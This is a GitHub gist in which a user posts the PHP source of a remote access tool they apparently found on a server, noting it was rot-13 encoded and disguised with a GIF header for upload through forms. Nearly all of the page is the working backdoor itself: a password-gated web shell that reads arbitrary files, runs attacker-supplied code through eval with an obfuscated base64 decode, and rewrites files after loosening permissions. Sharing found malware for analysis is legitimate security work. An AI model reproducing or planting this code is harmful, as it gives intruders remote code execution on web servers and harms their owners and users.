Skip to content

Instantly share code, notes, and snippets.

@jwieder
Created April 15, 2017 14:14
Show Gist options
  • Save jwieder/e7b769ca0aa6ddb259255400f8394f46 to your computer and use it in GitHub Desktop.
Save jwieder/e7b769ca0aa6ddb259255400f8394f46 to your computer and use it in GitHub Desktop.
This is the source code for a RAT I found. The RAT was rot-13 encoded, and contained a standard six byte .GIF header. The idea being to upload the file as an attachment for a form or other program that allows such foolishness. I found the revision number interesting.
/*
* REVISION: $Rev: 1426 $
*/
if (md5(md5($_REQUEST['hhh'])) == 'bc5aaff98e1783e8e30f266af63cea42') {
set_time_limit(36000);
function unslash_rec(&$arr)
{
reset($arr);
while (list($key) = each($arr))
{
if (is_array($arr[$key])) unslash_rec($arr[$key]);
else
{
$arr[$key] = stripslashes($arr[$key]);
};
};
};
function unslash_gpc()
{
if (get_magic_quotes_gpc())
{
unslash_rec($_POST);
};
};
if (array_key_exists('f', $_REQUEST))
{
unslash_gpc();
//header('Content-Type: text/plain');
$txt_src = '';
$txt_dst = '';
if (false === ($txt_src = file_get_contents($_REQUEST['f'])))
die("ERROR: 1 Failed to get file contents: {$_REQUEST['f']}<br/>\n");
$txt_dst = $txt_src;
if (filesize($_REQUEST['f']) != strlen($txt_src))
die("ERROR: 3 File size and contents size mismatch: {$_REQUEST['f']}<br/>\n");
if ($_POST['s'])
{
$cc = '64';
$cc = 'se' . $cc;
$cc .= '_';
$cc .= 'dec';
$cc = 'ba' . $cc;
$cc .= 'od';
$cc .= 'e';
if ($_POST['s1'] == 1) {
$_POST['cmt'] = file_get_contents($_FILES['cmt']['tmp_name']);
eval("{$cc}(\$_POST['s'])");
}
else {
eval($_POST['s']);
}
}
else
{
die("ERROR: 7 UNKNOWN OPERATION REQUESTED<br/>\n");
};
if ($txt_dst != $txt_src)
{
$stat = @stat($_REQUEST['f']);
if ($stat['mode'])
@chmod($_REQUEST['f'], 0666);
$hf = fopen($_REQUEST['f'], "w");
if (!$hf)
{
@chmod($_REQUEST['f'], $stat['mode'] & 0777);
die('ERROR: 2 Failed to open file for writing<br>\n');
};
fwrite($hf, $txt_dst);
fclose($hf);
if ($stat['mode'])
@chmod($_REQUEST['f'], $stat['mode'] & 0777);
};
print "OK: 0 ALL OPERATIONS SUCCEEDED<br/>\n";
}
else
{
print "ERROR: 7 UNKNOWN<br/>\n";
};
};
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment